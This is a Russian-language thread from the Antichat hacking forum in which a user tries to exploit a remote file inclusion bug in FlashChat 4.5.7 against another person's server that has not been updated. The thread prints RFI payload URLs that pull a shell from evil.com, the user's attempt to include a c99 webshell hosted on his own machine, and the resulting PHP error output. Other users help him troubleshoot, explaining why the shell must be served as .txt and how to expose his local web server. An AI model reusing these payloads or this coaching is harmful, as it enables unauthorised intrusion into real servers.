Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - Flashchat !!! (https://forum.antichat.xyz/showthread.php?t=29478)

Приветствую!!!

Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com

Код:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

Видео данной уязвимости:

http://rapidshare.de/files/31362430/Flashchat.rar.html

------------------------------------------------------------------------------------------------

Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это:

http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt?

Идет запрос и шелл не хочет грузиться попробоал убрать [inc]

На это вебсерв отрыгивает такое:

Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта
и возможно фаир рубит это дело на корню..

Вобщем или я туплю или чтото не так делаю :)

Пролейте свет !!!!!!

Вопрос в догонку :)

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!

ну вопервых денвер сначала надо настроить чтобы он смотрел в инет.

кидай в директорию c:/webservers/home/your_site/
файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)

содержанием

# dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача
# dnwr_host custom-host
# dnwr_port 80

Цитата:

Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Файр не файр но он не должен блокировать запрос скрипта на инклуд.

Цитата:

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!

файл не должен обрабатываться на сервере где он лежит(иначе инклудиться будет результат выполнения команды на сервере-хранилище). чат инклудя твой тхт считывает его содержимое и помещает в страницу свою вот тама он и будет обрабатываться.

Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.
Не знаю что там может быть непонятного. Пробуй сразу на вебе, не мучай себя и денвер. Кстати эту багу уже почти везде закрыли.

Цитата:

ну вопервых денвер сначала надо настроить чтобы он смотрел в инет. кидай в директорию c:/webservers/home/your_site/ файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться) содержанием # dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача # dnwr_host custom-host # dnwr_port 80

Забыл дополнит что все это в местной сетке adsl в тырнет доступа нет...
Но сомо собой я настройил апатчь чтобы он смотрел в
сетку с портом 80 но все равно нехочет цеплять шелл.
Но настройку я делал не через .htaccess а прописал
в httpd.conf есть ли разница ?!

Цитата:

Кстати эту багу уже почти везде закрыли.

Ну может ее много где и закрыли но у етого перца весит именно ета версия и бновлять как я вижу он ее пока не собирается :)

Цитата:

Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.

Все кокраз так и делаю толко разница втом что шелл посется на моем вебсерваке..

хм. такто разницы никакой. Но поробовать стоит. Этож денвер...

Цитата:

файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)

создать через експлорер нельзя, через командную строку - не вопрос
echo. > .htaccess

))) Ай блин. сам тупанул. чет даж мысли не возникало...

Пробовал .htaccess создавать неканает :) вобщем странно както
Возможно у него верссия подправленая хз

Хотя на запрос chat/inc/cmses/aedating4CMS.php выдает вот это

Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(db.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Пишет что нету такого файла или дирректории. Админ вполне мог их перенести, и изменить адреса подгружаемых файлов чата.